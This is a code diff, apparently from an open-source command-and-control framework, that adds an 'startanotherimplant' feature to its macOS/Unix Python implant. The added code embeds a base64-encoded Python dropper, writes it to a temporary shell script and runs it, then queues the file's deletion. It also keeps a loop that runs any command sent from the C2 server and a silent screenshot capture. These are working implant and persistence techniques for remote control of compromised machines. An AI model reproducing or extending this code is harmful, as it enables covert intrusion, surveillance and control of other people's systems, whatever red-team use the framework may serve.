Updated OSX for StartAnotherImplant

Help.py

@@ -305,4 +305,4 @@ COMMANDS += ['invoke-psexecpayload','invoke-wmipayload', 'invoke-dcompayload']
 COMMANDS += ['invoke-psexecproxypayload','invoke-wmiproxypayload', 'invoke-dcomproxypayload']
 COMMANDS += ['invoke-psexecdaisypayload','invoke-wmidaisypayload', 'invoke-dcomdaisypayload']
 
-UXCOMMANDS = ['get-screenshot',"pwd","id","setbeacon"]
+UXCOMMANDS = ["startanotherimplant-keepfile","get-screenshot","startanotherimplant","pwd","id","ps","setbeacon","kill-implant"]

Implant.py

@@ -31,6 +31,8 @@ class Implant(object):
     self.ServerURL = new_serverurl = select_item("HostnameIP", "C2Server")
     self.AllBeaconURLs = get_otherbeaconurls()
     self.AllBeaconImages = get_images()
+    with open("%spy_dropper.py" % (PayloadsDirectory), 'rb') as f:
+        self.PythonImplant = base64.b64encode(f.read())
     self.PythonCore = """import urllib2, os, subprocess, re, datetime, time, base64, string, random
 hh = '%s'
 timer = %s
@@ -39,6 +41,15 @@ urls = [%s]
 killdate = "%s"
 useragent = ""
 
+def sai():
+  imbase = "%s"
+  imfull = base64.b64decode(imbase)
+  output_file = open("/tmp/fdjskla.sh", 'w')
+  output_file.write(imfull)
+  output_file.close()
+  import subprocess
+  p = subprocess.Popen(["sh", "/tmp/fdjskla.sh"])
+
 def decrypt_bytes_gzip( key, data):
   iv = data[0:16]
   aes = get_encryption(key, iv)
@@ -78,6 +89,8 @@ while(True):
           #print cmd
           if "$sleeptime" in cmd:
             timer = int(cmd.replace("$sleeptime = ",""))
+          elif "startanotherimplant" in cmd:   
+            sai()
           else:
             returnval = subprocess.check_output(cmd, shell=True)
             #print returnval
@@ -101,7 +114,7 @@ while(True):
     except Exception as e:
       E = e
       #print "error %%s" %% e
-      w = \"\"""" % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.Key, self.RandomURI, self.ServerURL, self.UserAgent)
+      w = \"\"""" % (self.DomainFrontHeader,self.Sleep, self.AllBeaconImages, self.AllBeaconURLs, self.KillDate, self.PythonImplant, self.Key, self.RandomURI, self.ServerURL, self.UserAgent)
     self.C2Core = """
 $key="%s"
 $global:sleeptime = '%s'

ImplantHandler.py

@@ -365,6 +365,13 @@ def runcommand(command, randomuri):
       update_sleep(command, randomuri)
       new_task(sleep, randomuri)
 
+    elif 'startanotherimplant-keepfile' in command.lower():
+      new_task('startanotherimplant', randomuri)
+
+    elif 'startanotherimplant' in command.lower():
+      new_task(command.lower(), randomuri)
+      new_task("rm /tmp/fdjskla.sh", randomuri)
+
     elif 'get-screenshot' in command.lower():
       taskcmd = "screencapture -x /tmp/s;base64 /tmp/s;rm /tmp/s"
       new_task(taskcmd, randomuri)

Payloads.py

@@ -333,6 +333,10 @@ ao.run('%s', 0);window.close();
     py = base64.b64encode(self.Python)
     #print self.Python
     pydropper = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python &" % py
+    filename = "%spy_dropper.py" % (self.BaseDirectory)
+    output_file = open(filename, 'w')
+    output_file.write(pydropper)
+    output_file.close()
     self.QuickstartLog( pydropper )
 
   def CreateEXE(self, name=""):